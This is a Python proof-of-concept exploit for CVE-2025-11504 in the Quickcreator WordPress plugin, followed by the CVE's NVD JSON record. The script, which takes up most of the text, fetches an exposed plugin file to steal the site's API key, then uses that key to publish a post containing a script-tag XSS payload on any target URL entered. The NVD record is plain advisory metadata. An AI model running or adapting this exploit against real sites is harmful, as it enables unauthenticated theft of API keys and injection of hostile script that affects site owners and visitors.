CVE-2025-11504

import requests # CVE-2025-11504 PoC - Quickcreator Plugin Sensitive Information Exposure # Target: WordPress site with Quickcreator plugin <= 0.1.17 def exploit_cve_2025_11504(target_url): """ Exploit for CVE-2025-11504 This PoC demonstrates the information disclosure vulnerability """ # Step 1: Access the exposed file to retrieve API key exposed_file_url = f"{target_url}/wp-content/plugins/quickcreator/dupasrala.txt" try: response = requests.get(exposed_file_url, timeout=10) if response.status_code == 200: print(f"[+] Successfully accessed exposed file") print(f"[+] File content:") print(response.text) # Extract API key from response api_key = response.text.strip() # Step 2: Use the API key to create a malicious post create_post_url = f"{target_url}/wp-json/quickcreator/v1/posts" headers = { 'Authorization': f'Bearer {api_key}', 'Content-Type': 'application/json' } # Malicious payload for XSS injection post_data = { 'title': 'Malicious Post via Stolen API Key', 'content': '<script>alert("XSS via CVE-2025-11504")</script>', 'status': 'publish' } create_response = requests.post(create_post_url, json=post_data, headers=headers) if create_response.status_code in [200, 201]: print("[+] Successfully created malicious post with XSS payload") else: print(f"[-] Post creation failed: {create_response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = input("Enter target URL (e.g., http://example.com): ") exploit_cve_2025_11504(target)

{"cve": {"id": "CVE-2025-11504", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:42.853", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quickcreator – AI Blog Writer plugin for WordPress is vulnerable to Sensitive Information Exposure in versions 0.0.9 to 0.1.17 through the /wp-content/plugins/quickcreator/dupasrala.txt file. This makes it possible for unauthenticated attackers to view the plugin's API key and subsequently use that to perform actions on the site like creating new posts and injecting XSS payloads."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://wordpress.org/plugins/quickcreator/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/561f171e-f13e-408b-a63e-bf6a512d4463?source=cve", "source": "[email protected]"}]}}